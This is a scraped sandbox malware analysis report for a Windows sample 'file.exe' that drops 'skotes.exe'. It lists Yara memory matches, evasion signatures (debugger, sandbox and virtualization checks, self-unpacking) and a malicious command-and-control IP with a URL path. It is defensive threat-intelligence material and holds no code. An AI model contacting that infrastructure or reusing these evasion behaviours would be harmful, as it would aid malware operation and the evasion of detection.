Source: Yara match File source: 00000002.00000002.1497759494.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1423354567.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1466497850.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1457117559.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1507039683.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1611788887.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1463607272.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561043 Sample: file.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Antivirus detection for URL or domain 2->28 30 6 other signatures 2->30 6 file.exe 5 2->6         started        10 skotes.exe 12 2->10         started        13 skotes.exe 2->13         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\skotes.exe, PE32 6->18 dropped 20 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 skotes.exe 6->15         started        22 185.215.113.43, 49708, 49709, 49710 WHOLESALECONNECTIONSNL Portugal 10->22 38 Hides threads from debuggers 10->38 40 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->40 42 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->42 file5 signatures6 process7 signatures8 44 Antivirus detection for dropped file 15->44 46 Multi AV Scanner detection for dropped file 15->46 48 Detected unpacking (changes PE section rights) 15->48 50 6 other signatures 15->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.43/Zu7JuNko/index.php false
    		high